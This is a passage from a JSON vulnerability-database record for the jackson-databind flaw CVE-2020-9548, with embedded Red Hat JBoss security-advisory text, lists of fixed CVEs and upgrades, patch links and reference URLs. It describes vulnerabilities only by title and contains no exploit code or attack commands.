-14195\nhttps://access.redhat.com/security/cve/CVE-2020-14334\nhttps://access.redhat.com/security/cve/CVE-2020-14380\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK\n1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa\n5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr\noomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f\nZ8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io\nOhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX\nk9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG\nC2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5\n/6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta\nD2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a\nf4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG\n1yK/tAm1KBU=osSG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.3.1 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.3.0,\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.3.1 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* cxf: reflected XSS in the services listing page (CVE-2019-17573)\n\n* cxf-core: cxf: OpenId Connect token service does not properly validate\nthe clientId (CVE-2019-12423)\n\n* jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n(CVE-2019-10172)\n\n* undertow: servletPath in normalized incorrectly leading to dangerous\napplication mapping which could result in security bypass (CVE-2020-1757)\n\n* jackson-databind: XML external entity similar to CVE-2016-3720\n(CVE-2019-10172)\n\n* jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n(CVE-2019-10172)\n\n* resteasy-jaxrs: resteasy: Improper validation of response header in\nMediaTypeHeaderDelegate.java class (CVE-2020-1695)\n\n* cryptacular: excessive memory allocation during a decode operation\n(CVE-2020-7226)\n\n* smallrye-config: SmallRye: SecuritySupport class is incorrectly public\nand contains a static method to access the current threads context class\nloader (CVE-2020-1729)\n\n* resteasy: RESTEASY003870 exception in RESTEasy can lead to a reflected\nXSS attack (CVE-2020-10688)\n\n* jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n(CVE-2020-8840)\n\n* undertow: invalid HTTP request with large chunk size (CVE-2020-10719)\n\n* jackson-databind: Serialization gadgets in shaded-hikari-config\n(CVE-2020-9546)\n\n* jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547)\n\n* jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548)\n\n* undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745)\n\n* libthrift: thrift: Endless loop when feed with specific input data\n(CVE-2019-0205)\n\n* libthrift: thrift: Out-of-bounds read related to TJSONProtocol or\nTSimpleJSONProtocol (CVE-2019-0210)\n\n* wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not\nrespected if OpenSSL security provider is in use (CVE-2019-14887)\n\n* jsf-impl: Mojarra: Path traversal via either the loc parameter or the con\nparameter, incomplete fix of CVE-2018-14371 (CVE-2020-6950)\n\n* jsf-impl: mojarra: Path traversal in\nResourceManager.java:getLocalePrefix() via the loc parameter\n(CVE-2018-14371)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, see the CVE page(s) listed in the\nReferences section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1607709 - CVE-2018-14371 mojarra: Path traversal in ResourceManager.java:getLocalePrefix() via the loc parameter\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1764607 - CVE-2019-0210 thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol\n1764612 - CVE-2019-0205 thrift: Endless loop when feed with specific input data\n1772008 - CVE-2019-14887 wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not respected if OpenSSL security provider is in use\n1797006 - CVE-2019-12423 cxf: OpenId Connect token service does not properly validate the clientId\n1797011 - CVE-2019-17573 cxf: reflected XSS in the services listing page\n1801380 - CVE-2020-7226 cryptacular: excessive memory allocation during a decode operation\n1802444 - CVE-2020-1729 SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader\n1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-16114 - (7.3.z) Upgrade jboss-vfs to 3.2.15.Final\nJBEAP-18060 - [GSS](7.3.z) Upgrade weld from 3.1.2.Final-redhat-00001 to 3.1.4.Final-redhat-00001\nJBEAP-18163 - (7.3.z) Upgrade HAL from 3.2.3.Final-redhat-00001 to 3.2.8.Final-redhat-00001\nJBEAP-18221 - (7.3.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-00010 to 2.5.5.SP12-redhat-00012\nJBEAP-18240 - (7.3.z) Update the Chinese translations in WildFly Core\nJBEAP-18241 - (7.3.z) Update the Japanese translations in WildFly Core\nJBEAP-18273 - (7.3.z) Upgrade IronJacamar from 1.4.19.Final to 1.4.20.Final\nJBEAP-18277 - [GSS](7.3.z) Upgrade JBoss JSF API from 3.0.0.SP01-redhat-00001 to 3.0.0.SP02-redhat-00001\nJBEAP-18288 - [GSS](7.3.z) Upgrade FasterXML from 2.10.0 to 2.10.3\nJBEAP-18294 - (7.3.z) Upgrade JAXB from 2.3.1 to 2.3.3-b02 and com.sun.istack from 3.0.7 to 3.0.10\nJBEAP-18302 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.18 to 1.0.20\nJBEAP-18315 - [GSS](7.3.z) Upgrade Artemis from 2.9.0.redhat-00005 to 2.9.0.redhat-00010\nJBEAP-18346 - [GSS](7.3.z) Upgrade jakarta.el from 3.0.2.redhat-00001 to 3.0.3.redhat-00002\nJBEAP-18352 - [GSS](7.3.z) Upgrade JBoss Remoting from 5.0.16.Final-redhat-00001 to 5.0.18.Final-redhat-00001\nJBEAP-18361 - [GSS](7.3.z) Upgrade Woodstox from 5.0.3 to 6.0.3\nJBEAP-18367 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.15 to 5.3.16\nJBEAP-18393 - [GSS](7.3.z) Update $JBOSS_HOME/docs/schema to show https schema URL instead of http\nJBEAP-18397 - Tracker bug for the EAP 7.3.1 release for RHEL-6\nJBEAP-18409 - [GSS](7.3.z) Upgrade Infinispan from 9.4.16.Final-redhat-00002 to 9.4.18.Final-redhat-00001\nJBEAP-18527 - (7.3.z) Upgrade WildFly Naming Client from 1.0.10.Final to 1.0.12.Final\nJBEAP-18528 - (7.3.z) Upgrade jboss-ejb-client from 4.0.27.Final to 4.0.31.Final-redhat-00001\nJBEAP-18596 - [GSS](7.3.z) Upgrade JBoss Modules from 1.9.1 to 1.10.0\nJBEAP-18598 - [GSS](7.3.z) Upgrade Bouncycastle from 1.60.0-redhat-00001 to 1.60.0-redhat-00002\nJBEAP-18640 - [Runtimes] (7.3.x) Upgrade slf4j-jboss-logmanager from 1.0.3.GA.redhat-2 to 1.0.4.GA.redhat-00001\nJBEAP-18653 - (7.3.z) Upgrade Apache CXF from 3.3.4.redhat-00001 to 3.3.5.redhat-00001\nJBEAP-18706 - (7.3.z) Upgrade elytron-web from 1.6.0.Final to 1.6.1.Final\nJBEAP-18770 - Upgrade Jandex to 2.1.2.Final-redhat-00001\nJBEAP-18775 - (7.3.z) Upgrade WildFly Core to 10.1.4.Final-redhat-00001\nJBEAP-18788 - (7.3.x) Upgrade wss4j from 2.2.4.redhat-00001 to 2.2.5.redhat-00001\nJBEAP-18790 - (7.3.z) Upgrade cryptacular from 1.2.0.redhat-1 to 1.2.4.redhat-00001\nJBEAP-18818 - (7.3.z) Upgrade PicketBox from 5.0.3.Final-redhat-00005 to 5.0.3.Final-redhat-00006\nJBEAP-18836 - [GSS](7.3.z) Upgrade Remoting JMX from 3.0.3 to 3.0.4\nJBEAP-18850 - (7.3.z) Upgrade smallrye-config from 1.4.1 to 1.6.2\nJBEAP-18870 - Upgrade WildFly Common to 1.5.2.Final.redhat-00002\nJBEAP-18875 - Upgrade MicroProfile Metrics API to 2.3 and smallrye-metrics to 2.4.0\nJBEAP-18876 - Upgrade Smallrye Health to 2.2.0 and MP Health API to 2.2\nJBEAP-18877 - (7.3.z) Upgrade Jaeger client to 0.34.3\nJBEAP-18878 - Upgrade Smallrye Opentracing to 1.3.4 and MP Opentracing to 1.3.3\nJBEAP-18879 - (7.3.z) Upgrade MicroProfile Config 1.4\nJBEAP-18929 - (7.3.z) Upgrade WildFly Elytron from 1.10.5.Final-redhat-00001 to 1.10.6.Final\nJBEAP-18990 - (7.3.z) Upgrade jasypt from 1.9.2 to 1.9.3-redhat-00001\nJBEAP-18991 - (7.3.z) Upgrade opensaml from 3.3.0.redhat-1 to 3.3.1-redhat-00002\nJBEAP-19035 - In Building Custom Layers, update pom.xml content for 7.3.1\nJBEAP-19054 - Upgrade MP REST Client to 1.4.0.redhat-00004\nJBEAP-19066 - Upgrade snakeyaml from 1.18.0.redhat-2 to 1.24.0.redhat-00001\nJBEAP-19117 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.2.Final-redhat-00001 to 2.0.4.Final-redhat-00001\nJBEAP-19133 - [GSS](7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP08-redhat-00001 to 2.3.9.SP09-redhat-00001\nJBEAP-19156 - (7.3.z) Upgrade RESTEasy from 3.11.1.Final.redhat-00001 to 3.11.2.Final.redhat-00001\nJBEAP-19181 - (7.3.z) Upgrade WildFly Core to 10.1.5.Final-redhat-00001\nJBEAP-19192 - (7.3.z) Update the Japanese translations\nJBEAP-19232 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.7.Final-redhat-00001\nJBEAP-19281 - (7.3.z) Upgrade undertow from 2.0.30.SP2-redhat-00001 to 2.0.30.SP3-redhat-00001\nJBEAP-19456 - Upgrade wildfly-transaction-client to 1.1.11.Final\n\n7. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nThe JBoss server process must be restarted for the update to take effect",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9548"
},
{
"db": "VULHUB",
"id": "VHN-187673"
},
{
"db": "VULMON",
"id": "CVE-2020-9548"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158037"
},
{
"db": "PACKETSTORM",
"id": "158038"
},
{
"db": "PACKETSTORM",
"id": "159082"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-9548",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "159724",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159083",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158048",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158282",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.3558",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2287",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1440",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0828",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2050",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3065",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2042",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3703",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "46078",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "159080",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159082",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159081",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-15509",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-187673",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-9548",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158037",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158038",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187673"
},
{
"db": "VULMON",
"id": "CVE-2020-9548"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158037"
},
{
"db": "PACKETSTORM",
"id": "158038"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
},
{
"db": "NVD",
"id": "CVE-2020-9548"
}
]
},
"id": "VAR-202003-1782",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-187673"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:13:56.278000Z",
"patch": {
"_id": null,
"data": [
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=111241"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202813 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203638 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202515 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 6 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203637 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 8 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203639 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203642 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202513 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202512 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202511 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "Red Hat: Important: Satellite 6.8 release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204366 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Analyzer viewpoint",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2020-109"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities in Data-Binding for Jackson shipped with IBM Operations Analytics \u00e2\u20ac\u201c Log Analysis",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1db4c8cb14383c63d0c04205c943ef8a"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/fairyming/CVE-2020-9548 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-9548"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187673"
},
{
"db": "NVD",
"id": "CVE-2020-9548"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20200904-0006/"
},
{
"trust": 1.7,
"url": "https://github.com/fasterxml/jackson-databind/issues/2634"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3cdev.zookeeper.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3cissues.geode.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.9,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.7,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3cissues.geode.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3cdev.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.6,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-6950"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6950"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-fasterxml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-9548-cve-2020-9546-cve-2020-9547-cve-2020-8840-cve-2019-20330/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3703/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2287/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-watson-discovery-for-ibm-cloud-pak-for-data-affected-by-vulnerability-in-fasterxml-jackson-databind-6/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-jackson-databind-publicly-disclosed-vulnerability-found-in-network-performance-insight/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-affect-ibm-platform-symphony-and-ibm-spectrum-symphony-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-data-risk-manager-is-affected-by-multiple-vulnerabilities/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3558/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2050/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0828/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158048/red-hat-security-advisory-2020-2512-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2042/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-code-execution-via-anteros-core-31738"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158282/red-hat-security-advisory-2020-2813-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1440/"
},
{
"trust": 0.6,
